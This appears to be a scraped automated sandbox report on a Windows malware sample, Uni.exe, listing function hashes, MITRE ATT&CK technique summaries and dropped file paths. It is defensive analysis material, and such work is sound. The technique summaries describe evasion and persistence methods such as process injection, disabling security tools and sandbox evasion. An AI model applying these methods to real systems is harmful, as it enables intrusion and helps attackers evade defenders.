Opcode ID: 42001dd6f64ae4540006a7c8bff51f2fdc5dd7395cdf24936deb12e987f6496e
Instruction ID: cf4bcd68a5f4b443fc285bba9c03a7e880fa4aec38fb76e282406f4d364320fb
Opcode Fuzzy Hash: 42001dd6f64ae4540006a7c8bff51f2fdc5dd7395cdf24936deb12e987f6496e
Instruction Fuzzy Hash: 1501677111CB0C8FD744EF0CE451AA9B7E0FB95364F10056DE58AC3661D636E882CB45

Function 00007FFAAB774263 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31e8a709b0b15e4a46e005f297baaccb2e247db0171806d6e7c1052d6f148226
Instruction ID: ecab7cd8c62c036b92497372c8d43da8044186d6ae49d40872810a138825128c
Opcode Fuzzy Hash: 31e8a709b0b15e4a46e005f297baaccb2e247db0171806d6e7c1052d6f148226
Instruction Fuzzy Hash: 7EF0A03230CA084BA70CAA2CF8425F873C1DB95361B00427FF40AC6697DC16AC8382C6

Function 00007FFAAB7751BB Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ed4ab36dac1c2e58d1b15af4725b221cb0200b576841990cb7fd451102513a
Instruction ID: 7c0a54daf8fe5a6ce9879217a80ae99fa4ddd7ff5223cedcdf052f8fb7ec5663
Opcode Fuzzy Hash: 57ed4ab36dac1c2e58d1b15af4725b221cb0200b576841990cb7fd451102513a
Instruction Fuzzy Hash: A1F0827271C7048FDB58A61CE8529B973D0DB96335F10466EF08BC25A6D526E8428781

Function 00007FFAAB7757C8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1419658351.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffaab770000_Uni.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b24cef08bb51e451232c6360f985e290d6ae55cc892926f905a6646c39059b
Instruction ID: 06dcacf1dfab38b37cef04d53e07076b8d8c8d4e16c9011a318df8ec684fb17e
Opcode Fuzzy Hash: c8b24cef08bb51e451232c6360f985e290d6ae55cc892926f905a6646c39059b
Instruction Fuzzy Hash: E5F0373275C6048FDB5CAA1CF8429B573D1E795320B10457EE48BC2696D917F8468685

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Uni.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat

C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4absxr2.njg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svkgjrep.zh0.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
Uni.exe